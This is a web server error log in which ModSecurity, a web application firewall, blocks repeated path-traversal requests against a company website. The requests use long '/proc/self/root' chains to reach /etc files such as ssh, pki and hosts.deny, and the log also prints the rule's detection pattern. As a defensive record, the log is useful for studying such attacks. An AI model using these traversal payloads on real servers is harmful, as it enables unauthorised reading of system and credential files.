[Tue Mar 17 10:38:13.351560 2026] [:error] [pid 17965:tid 140411741927168] [client 74.7.243.203:51156] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablZRat8Nd0UC_OcbVG10AAAAIA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:38:14.716700 2026] [:error] [pid 18709:tid 140411599251200] [client 74.7.243.203:51162] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablZRjarLhPAjZGI1b20pQAAA5E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:38:17.111783 2026] [:error] [pid 1731:tid 140411733534464] [client 74.7.243.203:51164] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablZSQb2qCuy5irgBMjO9AAAAEE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:38:58.277265 2026] [:error] [pid 1731:tid 140411565680384] [client 74.7.243.203:51172] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablZcgb2qCuy5irgBMjPGwAAAFU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:39:02.149629 2026] [:error] [pid 2325:tid 140411599251200] [client 74.7.243.203:57114] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablZdu82sZHvlq4xgHrJ6gAAApE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:39:09.500858 2026] [:error] [pid 18380:tid 140411574073088] [client 74.7.241.46:43998] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/mtab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablZfa4xEDsg_V3ESNY6QwAAAhQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:39:24.523198 2026] [:error] [pid 18709:tid 140411565680384] [client 74.7.243.203:39660] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablZjDarLhPAjZGI1b20wwAAA5U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:39:25.839427 2026] [:error] [pid 17965:tid 140411548894976] [client 74.7.243.203:34160] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablZjat8Nd0UC_OcbVG17QAAAJc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:39:31.924484 2026] [:error] [pid 1016:tid 140411733534464] [client 74.7.243.203:34176] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablZkpqmL8PQht4WJFlORwAAAUE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:39:33.435669 2026] [:error] [pid 18604:tid 140411548894976] [client 74.7.243.203:56304] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablZlUBd0UqwxWindINu5AAAA1c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:39:48.057793 2026] [:error] [pid 2473:tid 140411666392832] [client 74.7.243.203:56320] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablZpKBJNF7axNlVR0UDqAAAAAk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:39:49.390327 2026] [:error] [pid 18380:tid 140411708356352] [client 74.7.243.203:37334] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablZpa4xEDsg_V3ESNY6TgAAAgQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:40:17.583554 2026] [:error] [pid 18380:tid 140411632822016] [client 74.7.243.203:39052] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablZwa4xEDsg_V3ESNY6dQAAAg0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:40:44.951170 2026] [:error] [pid 17965:tid 140411733534464] [client 74.7.241.46:36816] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablZ3Kt8Nd0UC_OcbVG2NQAAAIE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:40:53.851714 2026] [:error] [pid 18709:tid 140411607643904] [client 74.7.241.46:55094] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/hosts.deny"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablZ5TarLhPAjZGI1b205QAAA5A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:40:56.302017 2026] [:error] [pid 17965:tid 140411624429312] [client 74.7.241.46:48820] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/libaudit.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablZ6Kt8Nd0UC_OcbVG2OwAAAI4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:41:12.362727 2026] [:error] [pid 18604:tid 140411716749056] [client 74.7.228.16:57404] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ablZ-EBd0UqwxWindINu_wAAA0M"]
[Tue Mar 17 10:41:15.472293 2026] [:error] [pid 7437:tid 140411616036608] [client 74.7.243.203:52748] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablZ-weiSKl8TjouI-YIbwAAA88"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:41:21.494767 2026] [:error] [pid 2325:tid 140411725141760] [client 74.7.243.203:57426] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablaAe82sZHvlq4xgHrKLQAAAoI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:41:48.027341 2026] [:error] [pid 18380:tid 140411557287680] [client 74.7.243.203:60788] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablaHK4xEDsg_V3ESNY6oAAAAhY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:41:49.344433 2026] [:error] [pid 2473:tid 140411691570944] [client 74.7.243.203:58636] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablaHaBJNF7axNlVR0UDuwAAAAY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:41:51.454858 2026] [:error] [pid 7437:tid 140411565680384] [client 74.7.243.203:48058] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablaHweiSKl8TjouI-YIcwAAA9U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
